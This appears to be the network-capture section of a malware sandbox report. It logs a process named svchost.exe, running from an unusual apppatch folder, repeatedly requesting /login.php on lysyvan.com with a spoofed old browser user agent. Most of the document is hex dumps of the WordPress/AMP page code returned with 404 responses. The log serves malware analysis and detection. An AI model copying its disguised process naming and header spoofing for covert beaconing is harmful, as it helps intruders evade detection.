                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77
                                                                                                                                                                                                          Data Ascii: -description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-w
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74
                                                                                                                                                                                                          Data Ascii: webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63
                                                                                                                                                                                                          Data Ascii: nt .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-c
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d
                                                                                                                                                                                                          Data Ascii: e,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type=
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63
                                                                                                                                                                                                          Data Ascii: .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .selec


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          8192.168.2.861823188.114.97.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:32 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1092INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:34 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="84.3",amp_style_sanitizer;dur="40.6",amp_tag_and_attribute_sanitizer;dur="38.1",amp_optimizer;dur="22.2"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJiLYd4KKBd%2Fm7d%2BhBa9drInBBwIM4663Z7ZrbKl2D7ZKJPHW%2B0gd1PnkggHXThGKW%2FkxLs0QxD%2F2XgJ8dwNTrNwYoSK8uTywtDjgvGWPFEo59mPwEBFyeAHEYmuLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9fa5f0c0f5b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=e9b2a8aaf2341270&ts=1571&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC277INData Raw: 37 63 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c1a<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74
                                                                                                                                                                                                          Data Ascii: harset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78
                                                                                                                                                                                                          Data Ascii: olling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66
                                                                                                                                                                                                          Data Ascii: h:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70
                                                                                                                                                                                                          Data Ascii: mphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;p
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f
                                                                                                                                                                                                          Data Ascii: play:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;to
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d
                                                                                                                                                                                                          Data Ascii: lt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-am
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21
                                                                                                                                                                                                          Data Ascii: ttom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64
                                                                                                                                                                                                          Data Ascii: w:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accord


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          9192.168.2.861824188.114.97.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:35 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1089INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:36 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="34.2",amp_style_sanitizer;dur="16.3",amp_tag_and_attribute_sanitizer;dur="13.9",amp_optimizer;dur="17.2"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kus9P3y2%2BRqvAVpyEpaJbKgn68tLj1%2Bji4%2BAtNVBXpmuJbq0nb0w160qXy1KZOatWKVJpfdNsQrddTj6eftlrA8TO0BAZmgs%2BdO2mANgqhVgubhVbcamjvpbqxPuZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffa09bfebac30-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12237&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236678&cwnd=37&unsent_bytes=0&cid=1a8a2e71f1f2f113&ts=1547&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC280INData Raw: 37 63 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c1c<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30
